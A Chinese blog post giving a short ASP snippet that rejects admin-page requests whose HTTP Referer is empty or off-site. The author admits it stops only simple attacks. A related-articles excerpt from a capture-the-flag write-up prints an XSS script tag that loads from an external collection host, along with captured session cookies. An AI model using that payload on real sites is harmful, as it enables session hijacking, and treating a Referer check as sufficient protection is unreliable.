防止站外提交的代码

最新推荐文章于 2024-05-24 16:16:59 发布
最新推荐文章于 2024-05-24 16:16:59 发布
阅读量968 收藏
点赞数
分类专栏: 网络技术相关 文章标签: server

<%dim ComeUrl,cUrl
ComeUrl=lcase(trim(request.ServerVariables("HTTP_REFERER")))
if ComeUrl="" then
 response.write "<br><p align=center><font color='red'>对不起,为了系统安全,不允许直接输入地址访问本系统的后台管理页面。</font></p>"
 response.end
else
 cUrl=trim("http://" & Request.ServerVariables("SERVER_NAME"))
 if mid(ComeUrl,len(cUrl)+1,1)=":" then
  cUrl=cUrl & ":" & Request.ServerVariables("SERVER_PORT")
 end if
 cUrl=lcase(cUrl & request.ServerVariables("SCRIPT_NAME"))
 if lcase(left(ComeUrl,instrrev(ComeUrl,"/")))<>lcase(left(cUrl,instrrev(cUrl,"/"))) then
  response.write "<br><p align=center><font color='red'>对不起,为了系统安全,不允许从外部链接地址访问本系统的后台管理页面。</font></p>"
  response.end
 end if
end if
%> 

以上代码仅可防止简单的站外提交,要做完整的安全防护,还有很多东西要做...

wea1978
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Model Optimization 原理与代码实战案例讲解
禅与计算机程序设计艺术
07-07 569
Model Optimization 原理与代码实战案例讲解 作者:禅与计算机程序设计艺术 / Zen and the Art of Computer Programming 关键词:模型优化,超参数调整,损失函数,正则化,梯度下降 1. 背景介绍
【封神台 - 掌控安全靶场】尤里的复仇 Ⅰ 小芳!一二三四五六七章
热门推荐
algae
08-14 3万+
【封神台 - 掌控安全靶场】尤里的复仇 小芳!第五章:进击!拿到Web最高权限!【配套课时:绕过防护上传木马实战演练】(等级:15) <script src = https://xsspt.com/nxqPZY?1597410463> </ script> cookie : ASPSESSIONIDSQDARATQ=KJFAFKEDEAPPFBEDHJFCIGIC; flag=zkz{xsser-g00d},ADMINSESSIONIDCSTRCSDQ=LBMLMBCCNP
发一个自己封装的Asp Dll文件
01-17 751
调试程序和做程序的时候,好多重复的代码一直输入很麻烦,也很没有效率,封装一个自己的Asp包包,挺有有的下载个精简版的VB6.0,新建 ActiveX dll,以下是封装的代码,重要部分都有注释,不懂可以跟帖Option ExplicitPublic Resp As Response, Requ As Request, Appl As Application, Serv As Server, Ses
redis防治数据重复提交
li96666的博客
06-10 134
redis防治数据重复提交 Booleanname =redisTemplate.opsForValue().setIfAbsent(传过来的参数redis自动判断); 设置数据有效时间这里可以不用设置(自己测试为了方便) redisTemplate.expire(key,30,TimeUnit.MINUTES); 判断数据是否重复提交 if(name){ 通过存存储到数据库当中 }else{{ 不能重复提交 } 多数据...
web前端开发中防治重复提交
asxxf的博客
11-08 675
web前端数据请求或者表单提交往往通过对dom的点击事件来操作,但是往往因为认为点击过快(少年手速挺快的嘛),或者因为响应等待使得用户误人为没操作而重复很多次点击,造成表单数据的连续重复提交,造成用户体检的不好,甚至影响到整个系统的安全性。而前端的防治重复提交至少很有效的防治了人为正常操作下的很多不必要麻烦。下面就来讲讲如何有效避免前端的表单重复提交
如何避免重复提交问题
ChineseSoftware的博客
01-17 1144
一、简述 所谓幂等性,就是一个接口,多次发起同一个请求,该接口得保证结果是准确的,比如不能多扣款、不能多插入一条数据、不能将统计值多统计 1。这就是幂等性。 1️⃣在编程中常见的幂等 ①select 查询天然幂等 ②delete 删除也是幂等,删除同一个多次效果一样 ③update 直接更新某个值的,幂等 ④update 更新累加操作的,非幂等 ⑤insert 非幂等操作,每次新增一条 2️⃣产生原因:由于重复点击或者网络重发 ①点击提交按钮两次 ②点击刷新按钮 ③使用浏览器后退按钮重复之前的操作,导致重复
申报广东省林业有害生物防治丙级资质需要提交的资料清单
最新发布
VX15558192216的博客
05-24 305
根据规定,申报丙级资质的单位应具有从事林业有害生物防治工作经历的林业中级技术人员1名以上,以及林业有害生物防治员5名以上,其中中级及以上林业有害生物防治员不少于1名。同时,申报单位还需要认真阅读和理解申报指南和评审标准,确保所提交的资料符合评审要求,避免因资料不全或不符合要求而导致申报失败。除了以上必要的资料外,申报单位还可以根据自身情况提供其他有利于评审的资料,如单位的荣誉证书、获奖情况、参与林业有害生物防治项目的经验等。这些资料能够进一步展示单位的实力和能力,提升评审专家对单位的认可度。
WEB 前端开发中防治重复提交的实现方法
10-21
在WEB前端开发中,防治重复提交是一个常见的需求,主要是为了避免用户在表单提交过程中因为操作过快或是等待响应时重复点击提交按钮,导致服务器接收到多余的请求。本文将详细介绍几种常见的前端防治重复提交的方法...
森林虫害防治系统
08-13
从用户在表现层提交请求开始,经过控制器(Controller)转发到业务逻辑层进行处理,再由数据访问层操作数据库,最后将结果返回给用户。这个过程中,HTTP协议、MVC(Model-View-Controller)设计模式、以及数据库操作...
证券股份有限公司计算机病毒防治管理规范模版.docx
04-20
- **计算机病毒**:具有破坏性和自我复制能力的计算机程序或代码。 - **计算机病毒疫情**:指计算机病毒爆发的情况,包括时间、范围、特征和后果等。 - **信息介质**:包括硬盘、磁带、光盘、U盘等存储设备。 ##...
广东省级灾害防治及应急管理专项资金项目申报书.pdf
12-01
【广东省级灾害防治及应急管理专项资金项目申报书】是广东省应急管理厅制定的一份用于申报省级灾害防治及应急管理专项资金的文档。这份申报书详细规定了申报流程、填写要求和内容,旨在确保项目的合规性和真实性。 ...
web渗透测试之代码审计
赤赤三的博客
03-21 2988
基本信息: 原理: 代码安全测试是从安全的角度对代码进行测试评估 结合丰富的安全知识、编程经验、测试技术,利用静态分析和人工审核的方法寻找代码在架构和编码上的安全缺陷,在代码形成软件前将业务安全降到最低 方式: 人工+工具双重审核 人工审核: 既能解决内部问题也能解决外部问题,最有效率的解决方案,理论上人工审核最有效,但是效率不高,所以会采用自动化分析工具辅助人工的方式来提供效率 静态分析工具: 通过一组全面规则、测试机制和方针在软件开发过程、测试过
安全手册(初稿)[转]
weixin_30807677的博客
07-25 172
安全手册(初稿) 目录 一、输入验证3 1.什么是输入3 2.输入验证的必要性3 3.输入验证技术3 3.1 主要防御方式3 3.2 辅助防御方式:4 二、输出编码6 1.输出的种类6 2.输出编码的必要性6 3.输出编...
"防治计算机病毒与恶意代码,保障信息安全
计算机病毒与恶意代码的防治是当前信息安全领域中一个至关重要的话题。随着计算机病毒数量的不断增长,已经超过250万种,每天还以数百种的速度增长,这些病毒不仅可以盗取用户信息,还能够破坏计算机操作系统和各类...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值